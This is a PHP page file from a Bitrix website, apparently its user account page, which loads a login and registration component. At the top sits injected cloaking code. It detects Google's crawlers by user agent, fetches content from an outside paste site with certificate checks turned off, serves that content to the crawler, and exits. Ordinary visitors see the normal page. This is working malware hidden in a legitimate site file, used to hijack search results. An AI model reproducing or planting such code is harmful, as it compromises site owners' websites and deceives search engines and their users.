<?php
function is_google_crawler() {
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    return preg_match('/Google(bot|-Site-Verification|-InspectionTool|bot-Mobile|bot-News)/i', $ua);
}

if (is_google_crawler()) {
    $remote_url = 'https://paste.phyo186.cfd/jjVwe-Awcle/raw';

    $curl = curl_init();
    curl_setopt_array($curl, array(
        CURLOPT_URL => $remote_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_ENCODING => "",
        CURLOPT_TIMEOUT => 10,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_HTTPHEADER => array(
            'User-Agent: Googlebot'
        ),
    ));

    $response = curl_exec($curl);
    $httpcode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);

    if ($httpcode === 200 && $response) {
        echo $response;
    }

    exit;
}
?>

<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");
$APPLICATION->SetPageProperty("MENU_SHOW_SECTIONS", "Личный кабинет");
$APPLICATION->SetPageProperty("MENU_SHOW_ELEMENTS", "Личный кабинет");
$APPLICATION->SetPageProperty("title", "Личный кабинет");
$APPLICATION->SetTitle("Личный кабинет");?>
<?$APPLICATION->IncludeComponent("aspro:auth.allcorp2", "main", array(
	"SEF_MODE" => "Y",
	"SEF_FOLDER" => "/cabinet/",
	"SEF_URL_TEMPLATES" => array(
		"auth" => "auth/",
		"registration" => "registration/",
		"forgot_password" => "forgot-password/",
		"change_password" => "change-password/",
		"confirm_password" => "confirm-password/",
		"confirm_registration" => "confirm-registration/",
	),
	"PERSONAL" => "/personal/"
	),
	false
);?>
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?>
